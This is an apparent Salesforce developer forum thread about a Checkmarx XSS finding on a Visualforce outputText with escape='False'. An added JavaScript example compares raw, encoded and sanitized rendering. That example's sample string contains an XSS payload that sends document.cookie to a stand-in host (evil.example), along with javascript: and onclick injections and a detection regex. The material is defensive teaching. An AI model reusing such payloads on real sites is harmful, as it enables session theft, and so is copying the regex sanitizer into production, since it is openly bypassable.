Escaping in vf page
Hi All,
I have a line of code which is written like this.
<apex:outputText escape="False" value="{!cr.Message__c}" rendered="{!(cr.Message__c)!= ''}"/>
I am getting an issue in the Checkmarx report saying that this line is vulnerable to cross-site scripting (XSS). When I convert the above line to
<apex:outputText escape="False" value="{!HTMLENCODE(cr.Message__c)}" rendered="{!HTMLENCODE(cr.Message__c)!= ''}"/>
I am getting output like <p> Hi <br/> ... in this format. Kindly help me resolve this issue. Actually I am displaying the email message content in this VF page and displaying it in the case related list.
Thanks,
Anuj
Try changing it to outputField and remove escape="False"; it will automatically handle the vulnerability. Hope this helps.
It's a rich text area field.
Thanks,
Anuj
Rich Text Area fields are safe types to render as per Salesforce secure coding guidelines. The outputField tag will automatically encode unsafe characters.
https://salesforce.stackexchange.com/questions/106593/xss-rich-textarea-content-security-review-issue-when-using-escape-false
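As an added illustration (not code from this thread and not Salesforce's own code), the JavaScript below models the three renderings the thread discusses for a rich text value: raw output (what escape="False" on the untrusted field gives the browser), HTML encoding (what HTMLENCODE does, which is why the markup showed up as literal text like <p> Hi <br/>), and allowlist sanitizing, which keeps harmless formatting but strips script elements, event-handler attributes and javascript: URLs. That last property is what a "safe" rich text rendering relies on. The sample email body, the tag allowlist and the toy sanitizer are constructed for this example and do not reproduce Salesforce's sanitizer.

```javascript
// Added example, not from the original thread or from Salesforce.
// Three renderings of one rich-text value:
//   1. raw        -> attacker markup reaches the browser (XSS)
//   2. encoded    -> inert, but the tags display as text ("<p> Hi <br/>")
//   3. sanitized  -> formatting survives, active content removed

// Constructed sample: an email body stored in a rich text field, with an
// injected script element, an event-handler attribute and a javascript: URL.
const SAMPLE_MESSAGE =
  '<p>Hi <br/>please see the attached invoice.</p>' +
  '<script>document.location="https://evil.example/?c="+document.cookie</script>' +
  '<a href="javascript:alert(1)" onclick="steal()">link</a>';

// 1. Raw rendering: the value is emitted unchanged (escape="False").
function renderRaw(value) {
  return value;
}

// 2. Encoding: every markup-significant character becomes an entity, so the
// browser shows "<p>Hi <br/>" as text instead of rendering a paragraph.
function htmlEncode(value) {
  return value.replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// 3. Sanitizing: keep only an allowlist of tags and attributes and drop
// everything else. Toy implementation for illustration only.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'u', 'a', 'ul', 'ol', 'li']);
const ALLOWED_ATTRS = { a: ['href'] };

function sanitizeRichText(value) {
  // Remove script/style elements together with their bodies first.
  let out = value.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, '');
  // Then rewrite every remaining tag from its parsed parts.
  out = out.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g, (tag, name, attrs) => {
    const lower = name.toLowerCase();
    if (!ALLOWED_TAGS.has(lower)) return '';          // unknown tag: drop it
    if (tag.startsWith('</')) return `</${lower}>`;   // closing tag carries no attributes
    const keep = [];
    const allowed = ALLOWED_ATTRS[lower] || [];
    const attrRe = /([a-zA-Z-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    let m;
    while ((m = attrRe.exec(attrs)) !== null) {
      const aname = m[1].toLowerCase();
      const aval = m[3] ?? m[4] ?? m[5] ?? '';
      if (!allowed.includes(aname)) continue;         // drops onclick, onerror, ...
      // Only http(s), mailto and site-relative links; blocks javascript: URLs.
      if (aname === 'href' && !/^(https?:|mailto:|\/)/i.test(aval.trim())) continue;
      keep.push(`${aname}="${htmlEncode(aval)}"`);
    }
    const selfClose = (/\/\s*$/.test(attrs) || lower === 'br') ? ' /' : '';
    return `<${lower}${keep.length ? ' ' + keep.join(' ') : ''}${selfClose}>`;
  });
  return out;
}

// Crude detector used only to compare the three results: does the markup
// still contain a script element, an event-handler attribute on a tag,
// or a javascript: link that a browser would execute?
function containsActiveContent(html) {
  return /<script\b|<[a-z]+[^>]*\son[a-z]+\s*=|href\s*=\s*["']?javascript:/i.test(html);
}

function renderings(value) {
  return {
    raw: renderRaw(value),
    encoded: htmlEncode(value),
    sanitized: sanitizeRichText(value),
  };
}

const result = renderings(SAMPLE_MESSAGE);
for (const [mode, html] of Object.entries(result)) {
  console.log(`${mode}: active=${containsActiveContent(html)} -> ${html}`);
}
```

The regex sanitizer is here only to make the encode-versus-sanitize distinction concrete; HTML is not a regular language and this kind of sanitizer is easy to bypass. In a browser, use a tested library such as DOMPurify, and on the platform rely on outputField for rich text rather than escape="False" on outputText.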